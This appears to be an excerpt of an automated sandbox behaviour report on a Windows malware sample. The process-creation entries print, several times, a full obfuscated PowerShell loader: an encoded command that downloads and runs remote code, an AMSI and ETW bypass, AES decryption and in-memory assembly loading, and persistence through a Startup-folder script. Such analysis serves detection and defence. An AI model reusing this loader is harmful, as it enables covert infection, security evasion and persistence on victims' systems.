Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 8112Thread sleep count: 3396 > 30Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 8112Thread sleep count: 6356 > 30Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7348Thread sleep time: -20291418481080494s >= -30000sJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 756Thread sleep time: -1844674407370954s >= -30000sJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 756Thread sleep time: -922337203685477s >= -30000sJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7300Thread sleep count: 1457 > 30Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7296Thread sleep count: 840 > 30Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7320Thread sleep time: -922337203685477s >= -30000sJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2396Thread sleep count: 5407 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2464Thread sleep count: 4342 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2852Thread sleep time: -22136092888451448s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3428Thread sleep time: -1844674407370954s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3428Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3120Thread sleep count: 1539 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3120Thread sleep count: 99 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3712Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\System32\cmd.exeFile opened: C:\Users\user\AppData\Jump to behavior
Source: C:\Windows\System32\cmd.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Jump to behavior
Source: C:\Windows\System32\cmd.exeFile opened: C:\Users\user\AppData\Roaming\Jump to behavior
Source: C:\Windows\System32\cmd.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Jump to behavior
Source: C:\Windows\System32\cmd.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Jump to behavior
Source: C:\Windows\System32\cmd.exeFile opened: C:\Users\user\Jump to behavior
Source: wscript.exe, 00000000.00000002.1432781659.000002507006F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\3h6QL1gQ.bat" "Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /K "C:\Users\user\AppData\Local\Temp\3h6QL1gQ.bat" Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo $host.UI.RawUI.WindowTitle='C:\Users\user\AppData\Local\Temp\3h6QL1gQ.bat';$POIJOGD='ReadLEKOXCULineEKOXCULsEKOXCUL'.Replace('EKOXCUL', ''),'ETZYUBRBleTZYUBRBmenTZYUBRBtTZYUBRBAtTZYUBRB'.Replace('TZYUBRB', '');powershell -w hidden;iex (($([Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('U1RSSU5HUkFORE9NaVNUUklOR1JBTkRPTWVTVFJJTkdSQU5ET014ICgoaVNUUklOR1JBTkRPTXdTVFJJTkdSQU5ET01yU1RSSU5HUkFORE9NIC1TVFJJTkdSQU5ET01VU1RSSU5HUkFORE9Nc1NUUklOR1JBTkRPTWVTVFJJTkdSQU5ET01CU1RSSU5HUkFORE9NYVNUUklOR1JBTkRPTXNTVFJJTkdSQU5ET01pU1RSSU5HUkFORE9NY1NUUklOR1JBTkRPTVBTVFJJTkdSQU5ET01hU1RSSU5HUkFORE9NclNUUklOR1JBTkRPTXNTVFJJTkdSQU5ET01pU1RSSU5HUkFORE9NblNUUklOR1JBTkRPTWdTVFJJTkdSQU5ET00gIlNUUklOR1JBTkRPTWhTVFJJTkdSQU5ET010dHBzU1RSSU5HUkFORE9NOlNUUklOR1JBTkRPTS9TVFJJTkdSQU5ET00vU1RSSU5HUkFORE9NMFNUUklOR1JBTkRPTXhTVFJJTkdSQU5ET00wU1RSSU5HUkFORE9NLlNUUklOR1JBTkRPTXNTVFJJTkdSQU5ET010U1RSSU5HUkFORE9NL1NUUklOR1JBTkRPTThTVFJJTkdSQU5ET01aU1RSSU5HUkFORE9NRFNUUklOR1JBTkRPTWFTVFJJTkdSQU5ET00uU1RSSU5HUkFORE9NdFNUUklOR1JBTkRPTXhTVFJJTkdSQU5ET010U1RSSU5HUkFORE9NIikuQ29udGVudC5SZXBsYWNlKCdBQkMnLCcnKSkgLUVycm9yQWN0aW9uIFNpbGVudGx5Q29udGludWU7')))) -replace 'STRINGRANDOM', '');try{iex ((iex (('Invoke-SystemAmsiBypass -DisableETW;').Replace('TTTTT',''))).Content) -ErrorAction Stop}catch{"This system has a modified AMSI"};function SJDOX($param_var){$aes_var=[System.Security.Cryptography.Aes]::Create();$aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC;$aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$aes_var.Key=[System.Convert]::FromBase64String('WrTop3Dy2uR/7q23aw8qRRYFs5pR6KKW0qPOi2nk/SM=');$aes_var.IV=[System.Convert]::FromBase64String('X0OAAhUhQtx3irmnKHjIpQ==');$CPBHM=$aes_var.CreateDecryptor();$DWTPO=$CPBHM.TransformFinalBlock($param_var,0,$param_var.Length);$CPBHM.Dispose();$aes_var.Dispose();$DWTPO;}function decompress_function($param_var){$MLDOJ=New-Object System.IO.MemoryStream(,$param_var);$ILPTT=New-Object System.IO.MemoryStream;$ATXCE=New-Object System.IO.Compression.GZipStream($MLDOJ,[IO.Compression.CompressionMode]::Decompress);$ATXCE.CopyTo($ILPTT);$ATXCE.Dispose();$MLDOJ.Dispose();$ILPTT.Dispose();$ILPTT.ToArray();}$line_var=[System.IO.File]::($POIJOGD[0])([Console]::Title);$payload2_var=decompress_function (SJDOX ([Convert]::FromBase64String([System.Linq.Enumerable]::($POIJOGD[1])($line_var, 6).Substring(2))));[System.Reflection.Assembly]::Load([byte[]]$payload2_var).EntryPoint.Invoke($null,$null); "Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hiddenJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /K "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_75adaf3d.cmd" Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo $host.UI.RawUI.WindowTitle='C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_75adaf3d.cmd';$POIJOGD='ReadLEKOXCULineEKOXCULsEKOXCUL'.Replace('EKOXCUL', ''),'ETZYUBRBleTZYUBRBmenTZYUBRBtTZYUBRBAtTZYUBRB'.Replace('TZYUBRB', '');powershell -w hidden;iex (($([Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('U1RSSU5HUkFORE9NaVNUUklOR1JBTkRPTWVTVFJJTkdSQU5ET014ICgoaVNUUklOR1JBTkRPTXdTVFJJTkdSQU5ET01yU1RSSU5HUkFORE9NIC1TVFJJTkdSQU5ET01VU1RSSU5HUkFORE9Nc1NUUklOR1JBTkRPTWVTVFJJTkdSQU5ET01CU1RSSU5HUkFORE9NYVNUUklOR1JBTkRPTXNTVFJJTkdSQU5ET01pU1RSSU5HUkFORE9NY1NUUklOR1JBTkRPTVBTVFJJTkdSQU5ET01hU1RSSU5HUkFORE9NclNUUklOR1JBTkRPTXNTVFJJTkdSQU5ET01pU1RSSU5HUkFORE9NblNUUklOR1JBTkRPTWdTVFJJTkdSQU5ET00gIlNUUklOR1JBTkRPTWhTVFJJTkdSQU5ET010dHBzU1RSSU5HUkFORE9NOlNUUklOR1JBTkRPTS9TVFJJTkdSQU5ET00vU1RSSU5HUkFORE9NMFNUUklOR1JBTkRPTXhTVFJJTkdSQU5ET00wU1RSSU5HUkFORE9NLlNUUklOR1JBTkRPTXNTVFJJTkdSQU5ET010U1RSSU5HUkFORE9NL1NUUklOR1JBTkRPTThTVFJJTkdSQU5ET01aU1RSSU5HUkFORE9NRFNUUklOR1JBTkRPTWFTVFJJTkdSQU5ET00uU1RSSU5HUkFORE9NdFNUUklOR1JBTkRPTXhTVFJJTkdSQU5ET010U1RSSU5HUkFORE9NIikuQ29udGVudC5SZXBsYWNlKCdBQkMnLCcnKSkgLUVycm9yQWN0aW9uIFNpbGVudGx5Q29udGludWU7')))) -replace 'STRINGRANDOM', '');try{iex ((iex (('Invoke-SystemAmsiBypass -DisableETW;').Replace('TTTTT',''))).Content) -ErrorAction Stop}catch{"This system has a modified AMSI"};function SJDOX($param_var){$aes_var=[System.Security.Cryptography.Aes]::Create();$aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC;$aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$aes_var.Key=[System.Convert]::FromBase64String('WrTop3Dy2uR/7q23aw8qRRYFs5pR6KKW0qPOi2nk/SM=');$aes_var.IV=[System.Convert]::FromBase64String('X0OAAhUhQtx3irmnKHjIpQ==');$CPBHM=$aes_var.CreateDecryptor();$DWTPO=$CPBHM.TransformFinalBlock($param_var,0,$param_var.Length);$CPBHM.Dispose();$aes_var.Dispose();$DWTPO;}function decompress_function($param_var){$MLDOJ=New-Object System.IO.MemoryStream(,$param_var);$ILPTT=New-Object System.IO.MemoryStream;$ATXCE=New-Object System.IO.Compression.GZipStream($MLDOJ,[IO.Compression.CompressionMode]::Decompress);$ATXCE.CopyTo($ILPTT);$ATXCE.Dispose();$MLDOJ.Dispose();$ILPTT.Dispose();$ILPTT.ToArray();}$line_var=[System.IO.File]::($POIJOGD[0])([Console]::Title);$payload2_var=decompress_function (SJDOX ([Convert]::FromBase64String([System.Linq.Enumerable]::($POIJOGD[1])($line_var, 6).Substring(2))));[System.Reflection.Assembly]::Load([byte[]]$payload2_var).EntryPoint.Invoke($null,$null); "Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe c:\windows\system32\cmd.exe /s /d /c" echo $host.ui.rawui.windowtitle='c:\users\user\appdata\local\temp\3h6ql1gq.bat';$poijogd='readlekoxculineekoxculsekoxcul'.replace('ekoxcul', ''),'etzyubrbletzyubrbmentzyubrbttzyubrbattzyubrb'.replace('tzyubrb', '');powershell -w hidden;iex (($([text.encoding]::utf8.getstring([convert]::frombase64string('u1rssu5hukfore9navnuuklor1jbtkrptwvtvfjjtkdsqu5et014icgoavnuuklor1jbtkrptxdtvfjjtkdsqu5et01yu1rssu5hukfore9nic1tvfjjtkdsqu5et01vu1rssu5hukfore9nc1nuuklor1jbtkrptwvtvfjjtkdsqu5et01cu1rssu5hukfore9nyvnuuklor1jbtkrptxntvfjjtkdsqu5et01pu1rssu5hukfore9ny1nuuklor1jbtkrptvbtvfjjtkdsqu5et01hu1rssu5hukfore9nclnuuklor1jbtkrptxntvfjjtkdsqu5et01pu1rssu5hukfore9nblnuuklor1jbtkrptwdtvfjjtkdsqu5et00gilnuuklor1jbtkrptwhtvfjjtkdsqu5et010dhbzu1rssu5hukfore9nolnuuklor1jbtkrpts9tvfjjtkdsqu5et00vu1rssu5hukfore9nmfnuuklor1jbtkrptxhtvfjjtkdsqu5et00wu1rssu5hukfore9nllnuuklor1jbtkrptxntvfjjtkdsqu5et010u1rssu5hukfore9nl1nuuklor1jbtkrptthtvfjjtkdsqu5et01au1rssu5hukfore9nrfnuuklor1jbtkrptwftvfjjtkdsqu5et00uu1rssu5hukfore9ndfnuuklor1jbtkrptxhtvfjjtkdsqu5et010u1rssu5hukfore9niikuq29udgvudc5szxbsywnlkcdbqkmnlccnkskgluvycm9yqwn0aw9uifnpbgvudgx5q29udgludwu7')))) -replace 'stringrandom', '');try{iex ((iex (('invoke-systemamsibypass -disableetw;').replace('ttttt',''))).content) -erroraction stop}catch{"this system has a modified amsi"};function sjdox($param_var){$aes_var=[system.security.cryptography.aes]::create();$aes_var.mode=[system.security.cryptography.ciphermode]::cbc;$aes_var.padding=[system.security.cryptography.paddingmode]::pkcs7;$aes_var.key=[system.convert]::frombase64string('wrtop3dy2ur/7q23aw8qrryfs5pr6kkw0qpoi2nk/sm=');$aes_var.iv=[system.convert]::frombase64string('x0oaahuhqtx3irmnkhjipq==');$cpbhm=$aes_var.createdecryptor();$dwtpo=$cpbhm.transformfinalblock($param_var,0,$param_var.length);$cpbhm.dispose();$aes_var.dispose();$dwtpo;}function decompress_function($param_var){$mldoj=new-object system.io.memorystream(,$param_var);$ilptt=new-object system.io.memorystream;$atxce=new-object system.io.compression.gzipstream($mldoj,[io.compression.compressionmode]::decompress);$atxce.copyto($ilptt);$atxce.dispose();$mldoj.dispose();$ilptt.dispose();$ilptt.toarray();}$line_var=[system.io.file]::($poijogd[0])([console]::title);$payload2_var=decompress_function (sjdox ([convert]::frombase64string([system.linq.enumerable]::($poijogd[1])($line_var, 6).substring(2))));[system.reflection.assembly]::load([byte[]]$payload2_var).entrypoint.invoke($null,$null); "
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe c:\windows\system32\cmd.exe /s /d /c" echo $host.ui.rawui.windowtitle='c:\users\user\appdata\roaming\microsoft\windows\start menu\programs\startup\startupscript_75adaf3d.cmd';$poijogd='readlekoxculineekoxculsekoxcul'.replace('ekoxcul', ''),'etzyubrbletzyubrbmentzyubrbttzyubrbattzyubrb'.replace('tzyubrb', '');powershell -w hidden;iex (($([text.encoding]::utf8.getstring([convert]::frombase64string('u1rssu5hukfore9navnuuklor1jbtkrptwvtvfjjtkdsqu5et014icgoavnuuklor1jbtkrptxdtvfjjtkdsqu5et01yu1rssu5hukfore9nic1tvfjjtkdsqu5et01vu1rssu5hukfore9nc1nuuklor1jbtkrptwvtvfjjtkdsqu5et01cu1rssu5hukfore9nyvnuuklor1jbtkrptxntvfjjtkdsqu5et01pu1rssu5hukfore9ny1nuuklor1jbtkrptvbtvfjjtkdsqu5et01hu1rssu5hukfore9nclnuuklor1jbtkrptxntvfjjtkdsqu5et01pu1rssu5hukfore9nblnuuklor1jbtkrptwdtvfjjtkdsqu5et00gilnuuklor1jbtkrptwhtvfjjtkdsqu5et010dhbzu1rssu5hukfore9nolnuuklor1jbtkrpts9tvfjjtkdsqu5et00vu1rssu5hukfore9nmfnuuklor1jbtkrptxhtvfjjtkdsqu5et00wu1rssu5hukfore9nllnuuklor1jbtkrptxntvfjjtkdsqu5et010u1rssu5hukfore9nl1nuuklor1jbtkrptthtvfjjtkdsqu5et01au1rssu5hukfore9nrfnuuklor1jbtkrptwftvfjjtkdsqu5et00uu1rssu5hukfore9ndfnuuklor1jbtkrptxhtvfjjtkdsqu5et010u1rssu5hukfore9niikuq29udgvudc5szxbsywnlkcdbqkmnlccnkskgluvycm9yqwn0aw9uifnpbgvudgx5q29udgludwu7')))) -replace 'stringrandom', '');try{iex ((iex (('invoke-systemamsibypass -disableetw;').replace('ttttt',''))).content) -erroraction stop}catch{"this system has a modified amsi"};function sjdox($param_var){$aes_var=[system.security.cryptography.aes]::create();$aes_var.mode=[system.security.cryptography.ciphermode]::cbc;$aes_var.padding=[system.security.cryptography.paddingmode]::pkcs7;$aes_var.key=[system.convert]::frombase64string('wrtop3dy2ur/7q23aw8qrryfs5pr6kkw0qpoi2nk/sm=');$aes_var.iv=[system.convert]::frombase64string('x0oaahuhqtx3irmnkhjipq==');$cpbhm=$aes_var.createdecryptor();$dwtpo=$cpbhm.transformfinalblock($param_var,0,$param_var.length);$cpbhm.dispose();$aes_var.dispose();$dwtpo;}function decompress_function($param_var){$mldoj=new-object system.io.memorystream(,$param_var);$ilptt=new-object system.io.memorystream;$atxce=new-object system.io.compression.gzipstream($mldoj,[io.compression.compressionmode]::decompress);$atxce.copyto($ilptt);$atxce.dispose();$mldoj.dispose();$ilptt.dispose();$ilptt.toarray();}$line_var=[system.io.file]::($poijogd[0])([console]::title);$payload2_var=decompress_function (sjdox ([convert]::frombase64string([system.linq.enumerable]::($poijogd[1])($line_var, 6).substring(2))));[system.reflection.assembly]::load([byte[]]$payload2_var).entrypoint.invoke($null,$null); "
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe c:\windows\system32\cmd.exe /s /d /c" echo $host.ui.rawui.windowtitle='c:\users\user\appdata\local\temp\3h6ql1gq.bat';$poijogd='readlekoxculineekoxculsekoxcul'.replace('ekoxcul', ''),'etzyubrbletzyubrbmentzyubrbttzyubrbattzyubrb'.replace('tzyubrb', '');powershell -w hidden;iex (($([text.encoding]::utf8.getstring([convert]::frombase64string('u1rssu5hukfore9navnuuklor1jbtkrptwvtvfjjtkdsqu5et014icgoavnuuklor1jbtkrptxdtvfjjtkdsqu5et01yu1rssu5hukfore9nic1tvfjjtkdsqu5et01vu1rssu5hukfore9nc1nuuklor1jbtkrptwvtvfjjtkdsqu5et01cu1rssu5hukfore9nyvnuuklor1jbtkrptxntvfjjtkdsqu5et01pu1rssu5hukfore9ny1nuuklor1jbtkrptvbtvfjjtkdsqu5et01hu1rssu5hukfore9nclnuuklor1jbtkrptxntvfjjtkdsqu5et01pu1rssu5hukfore9nblnuuklor1jbtkrptwdtvfjjtkdsqu5et00gilnuuklor1jbtkrptwhtvfjjtkdsqu5et010dhbzu1rssu5hukfore9nolnuuklor1jbtkrpts9tvfjjtkdsqu5et00vu1rssu5hukfore9nmfnuuklor1jbtkrptxhtvfjjtkdsqu5et00wu1rssu5hukfore9nllnuuklor1jbtkrptxntvfjjtkdsqu5et010u1rssu5hukfore9nl1nuuklor1jbtkrptthtvfjjtkdsqu5et01au1rssu5hukfore9nrfnuuklor1jbtkrptwftvfjjtkdsqu5et00uu1rssu5hukfore9ndfnuuklor1jbtkrptxhtvfjjtkdsqu5et010u1rssu5hukfore9niikuq29udgvudc5szxbsywnlkcdbqkmnlccnkskgluvycm9yqwn0aw9uifnpbgvudgx5q29udgludwu7')))) -replace 'stringrandom', '');try{iex ((iex (('invoke-systemamsibypass -disableetw;').replace('ttttt',''))).content) -erroraction stop}catch{"this system has a modified amsi"};function sjdox($param_var){$aes_var=[system.security.cryptography.aes]::create();$aes_var.mode=[system.security.cryptography.ciphermode]::cbc;$aes_var.padding=[system.security.cryptography.paddingmode]::pkcs7;$aes_var.key=[system.convert]::frombase64string('wrtop3dy2ur/7q23aw8qrryfs5pr6kkw0qpoi2nk/sm=');$aes_var.iv=[system.convert]::frombase64string('x0oaahuhqtx3irmnkhjipq==');$cpbhm=$aes_var.createdecryptor();$dwtpo=$cpbhm.transformfinalblock($param_var,0,$param_var.length);$cpbhm.dispose();$aes_var.dispose();$dwtpo;}function decompress_function($param_var){$mldoj=new-object system.io.memorystream(,$param_var);$ilptt=new-object system.io.memorystream;$atxce=new-object system.io.compression.gzipstream($mldoj,[io.compression.compressionmode]::decompress);$atxce.copyto($ilptt);$atxce.dispose();$mldoj.dispose();$ilptt.dispose();$ilptt.toarray();}$line_var=[system.io.file]::($poijogd[0])([console]::title);$payload2_var=decompress_function (sjdox ([convert]::frombase64string([system.linq.enumerable]::($poijogd[1])($line_var, 6).substring(2))));[system.reflection.assembly]::load([byte[]]$payload2_var).entrypoint.invoke($null,$null); "Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe c:\windows\system32\cmd.exe /s /d /c" echo $host.ui.rawui.windowtitle='c:\users\user\appdata\roaming\microsoft\windows\start menu\programs\startup\startupscript_75adaf3d.cmd';$poijogd='readlekoxculineekoxculsekoxcul'.replace('ekoxcul', ''),'etzyubrbletzyubrbmentzyubrbttzyubrbattzyubrb'.replace('tzyubrb', '');powershell -w hidden;iex (($([text.encoding]::utf8.getstring([convert]::frombase64string('u1rssu5hukfore9navnuuklor1jbtkrptwvtvfjjtkdsqu5et014icgoavnuuklor1jbtkrptxdtvfjjtkdsqu5et01yu1rssu5hukfore9nic1tvfjjtkdsqu5et01vu1rssu5hukfore9nc1nuuklor1jbtkrptwvtvfjjtkdsqu5et01cu1rssu5hukfore9nyvnuuklor1jbtkrptxntvfjjtkdsqu5et01pu1rssu5hukfore9ny1nuuklor1jbtkrptvbtvfjjtkdsqu5et01hu1rssu5hukfore9nclnuuklor1jbtkrptxntvfjjtkdsqu5et01pu1rssu5hukfore9nblnuuklor1jbtkrptwdtvfjjtkdsqu5et00gilnuuklor1jbtkrptwhtvfjjtkdsqu5et010dhbzu1rssu5hukfore9nolnuuklor1jbtkrpts9tvfjjtkdsqu5et00vu1rssu5hukfore9nmfnuuklor1jbtkrptxhtvfjjtkdsqu5et00wu1rssu5hukfore9nllnuuklor1jbtkrptxntvfjjtkdsqu5et010u1rssu5hukfore9nl1nuuklor1jbtkrptthtvfjjtkdsqu5et01au1rssu5hukfore9nrfnuuklor1jbtkrptwftvfjjtkdsqu5et00uu1rssu5hukfore9ndfnuuklor1jbtkrptxhtvfjjtkdsqu5et010u1rssu5hukfore9niikuq29udgvudc5szxbsywnlkcdbqkmnlccnkskgluvycm9yqwn0aw9uifnpbgvudgx5q29udgludwu7')))) -replace 'stringrandom', '');try{iex ((iex (('invoke-systemamsibypass -disableetw;').replace('ttttt',''))).content) -erroraction stop}catch{"this system has a modified amsi"};function sjdox($param_var){$aes_var=[system.security.cryptography.aes]::create();$aes_var.mode=[system.security.cryptography.ciphermode]::cbc;$aes_var.padding=[system.security.cryptography.paddingmode]::pkcs7;$aes_var.key=[system.convert]::frombase64string('wrtop3dy2ur/7q23aw8qrryfs5pr6kkw0qpoi2nk/sm=');$aes_var.iv=[system.convert]::frombase64string('x0oaahuhqtx3irmnkhjipq==');$cpbhm=$aes_var.createdecryptor();$dwtpo=$cpbhm.transformfinalblock($param_var,0,$param_var.length);$cpbhm.dispose();$aes_var.dispose();$dwtpo;}function decompress_function($param_var){$mldoj=new-object system.io.memorystream(,$param_var);$ilptt=new-object system.io.memorystream;$atxce=new-object system.io.compression.gzipstream($mldoj,[io.compression.compressionmode]::decompress);$atxce.copyto($ilptt);$atxce.dispose();$mldoj.dispose();$ilptt.dispose();$ilptt.toarray();}$line_var=[system.io.file]::($poijogd[0])([console]::title);$payload2_var=decompress_function (sjdox ([convert]::frombase64string([system.linq.enumerable]::($poijogd[1])($line_var, 6).substring(2))));[system.reflection.assembly]::load([byte[]]$payload2_var).entrypoint.invoke($null,$null); "Jump to behavior
Source: C:\Windows\System32\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
